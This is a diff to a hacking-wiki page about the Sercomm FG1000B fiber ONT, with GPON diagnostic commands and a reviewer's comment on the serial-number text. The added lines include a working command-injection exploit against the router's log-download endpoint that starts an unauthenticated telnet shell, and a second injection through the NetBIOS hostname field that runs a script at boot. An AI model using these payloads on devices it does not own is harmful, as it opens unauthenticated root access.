_ont/ont-sercomm-fg1000b-11.md

```diff
@@ -44,14 +44,173 @@ The ONT seems only to display output of the ROM CFE and flash CFE, but don't all
+	return response.text();
+}).then(function (html) {
+	//inject the html response into a HTML DOM to parse it
+    var el = document.createElement( 'html' );
+    el.innerHTML = html;
+	//The token is inserted into the first <script> tag of the page
+    var es = el.getElementsByTagName( 'script' );
+	var aText = es[0].text;
+	//Add the csrf token in the document for other requests
+    document.csrf_token = aText.match("'(.*)'")[1];
+}).catch(function (err) {
+	console.warn('Something went wrong.', err);
+});
+
+//use the csrf token to activate telnet with no login and a shell
+
+fetch('http://192.168.100.1/data/statussupporteventlog_applog_download.json?_=1686211215966&csrf_token='+document.csrf_token, {
+  method: 'POST',
+  headers: {
+    'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8'
+  },
+  body: 'applog_select=a;echo "#!/bin/sh" > /tmp/slogin;echo "export PATH=/bin:/sbin:/usr/bin:/usr/sbin" >> /tmp/slogin;echo "/bin/sh" >> /tmp/slogin;/bin/chmod 755 /tmp/slogin;/usr/sbin/telnetd -l /tmp/slogin'
+})
+.then(res => res.json())
+.then(console.log)
+```
+
+There is a way to make a script call at boot if you want to have telnet or other service started at boot. It uses a hack from libsl_system.so where there is a `system(...)` call using a String from config, string must be <=12 char, the system call is supposed to set set hostname of the device for storage sharing.
+In the example below you would first creat a `/data/up` shell script and ensure it has execute rights (ex: `chmod 755`)
+```
+#first we need to add the missing entry
+/usr/bin/cmld_client add InternetGatewayDevice.Services.StorageService. 1
+#then inject within the 12 character limit the hostname and a call to our script
+/usr/bin/cmld_client set InternetGatewayDevice.Services.StorageService.1.X_SC_NetbiosName='a;/data/up&'
+/usr/bin/cmld_client save
+```
+
+## Log configuration
+`syslogd` is configure via Config DB config `cmld_client get_node InternetGatewayDevice.X_SC_Management.Syslog.` this config is read from the libsl_syslog.so plugin of smd daemon, which generate the file `/tmp/lxxd/logd.conf` and start the daemon with it as parameter.
+
+# GPON ONU status
+
+## Get the operational status of the ONU
+```
+/bin/gponctl getState
+``` 
+
+## Get information of the OLT vendor
+```
+/usr/sbin/umci_ctl stack get olt_type
+```
+or
+```
+/usr/sbin/umci_ctl rg help
+```
+
+## Querying a particular OMCI ME
+```
+/usr/sbin/umci_ctl mib
+```
+
+## Getting/Setting Speed LAN Mode
+
 # GPON/OMCI settings
+
+Part of GPON config is done via the misc configuration loaded as first lib by the smd binary, config can be seens here:
+```
+/usr/bin/cmld_client get_node InternetGatewayDevice.X_SC_MiscCfg.GPON.
+```
+Beware the field `OmciManageUniMask`, `PretendFwVersion` are initiated in the binary with respective value `01000000`, `0`
+
+## Getting/Setting ONU GPON Serial Number
+`Default value: 16` hexa on the back of the ONT, starts with `53434F4DA`
```

Comment:
I'm not sure why there are backquotes here, but it separates `16` from `hex chars on the back of the ONT`.

The default S/N is the `Modem-ID` on the sticker.